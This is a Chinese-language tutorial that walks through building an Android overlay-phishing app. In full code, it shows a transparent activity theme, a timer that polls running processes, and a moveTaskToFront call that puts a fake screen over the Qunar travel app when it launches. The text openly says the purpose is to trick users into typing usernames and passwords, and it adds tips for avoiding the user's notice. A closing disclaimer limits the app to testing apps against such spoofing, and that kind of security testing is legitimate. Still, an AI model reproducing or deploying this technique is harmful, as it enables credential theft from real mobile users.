android透明UI欺骗的简单实现

1.应用使用方法

将本应用运行在后台，当特定的应用启动时，本应用会自动弹出背景透明的界面，覆盖在原应用上，特别是当被覆盖应用启动时是密码输入界面时，透明UI可以欺骗用户，以达到获取用户名、密码等个人信息的目的。

2.实现原理

本程序使用到透明背景界面的创建、应用后台转前台、定时查找当前运行task和app等功能。

3.实现步骤

3.1实现透明UI

首先实现自己定义的透明主题，在res/values/styles.xml中定义style如下：

<style name="shenmegui_transparent">    <item name="android:windowBackground">@color/transparent</item>    <item name="android:windowNoTitle">true</item>    <item name="android:windowIsTranslucent">true</item>    <item name="android:windowAnimationStyle">@android:style/Animation.Translucent</item></style>

其中color/transparent是定义在res/values/colors.xml中的透明色，所以在res/values/colors.xml中添加：

<color name="transparent">#0000</color>

最后在AndroidManifest.xml文件中引入自己的主题：

android:theme="@style/shenmegui_transparent">

这样，我们的界面就是透明的了。

3.2实现定时查看当前运行程序功能

当被伪造的程序开始运行时，需要弹出伪造界面，故需不断的查看当前运行的程序，本程序使用timer实现。当当前运行程序是欲覆盖应用时，使用moveTaskToFront将应用欺骗界面显示出来。具体程序如下：

public void timer(final Context context){        Timer timer=new Timer();        final TimerTask timerTask=new TimerTask() {        @Override        public void run() {            ActivityManager myActivityManager= (ActivityManager) context.getSystemService(context.ACTIVITY_SERVICE);            List<ActivityManager.RunningTaskInfo> list_task=myActivityManager.getRunningTasks(100);            List<ActivityManager.RunningAppProcessInfo> list=myActivityManager.getRunningAppProcesses();            //若当前运行程序为“去哪儿”，则调用欺骗界面。            if (list.get(0).processName.equals("com.Qunar")){                //为了使“去哪儿”程序完全呈现出来，暂停本程序6s。此处不暂停可用来实现程序锁功能。                try{                    Thread.sleep(6000);                    Log.i("shenmegui","成功暂停6s");                }catch (InterruptedException e){                    e.printStackTrace();                }                //遍历当前运行task，找到本程序所在task，移至前台。                for (ActivityManager.RunningTaskInfo i:list_task                     ) {                    if (i.topActivity.getPackageName().equals(context.getPackageName())){                        myActivityManager.moveTaskToFront(i.id,0);                    }                }                //调用欺骗界面。                Intent intent=new Intent();                intent.setClass(context,SecondActivity.class);               // intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);                context.startActivity(intent);                this.cancel();            }            Log.i("processName", list.get(0).processName);        }    };    timer.schedule(timerTask,0,4*1000);}

其中SecondActivity.class即为弹出的透明UI欺骗界面。具体SecondActivity类的写法就是根据被模仿的程序界面不同而不同了，但是要注意，要在SecondActivity中写退出程序的语句，否则用户不能在透明界面进一步操作，就会被用户发现。

最后还要注意在AndroidManifest.xml中写上权限的声明：

    <uses-permission android:name="android.permission.REORDER_TASKS"></uses-permission>    <uses-permission android:name="android.permission.GET_TASKS"></uses-permission>

4.郑重声明

本透明UI欺骗程序只能用于正当用途，比如只用来测试目标软件是否具有防止被透明UI欺骗的能力。本文档只作为本人日后参考和android漏洞测试人员最初级学习参考。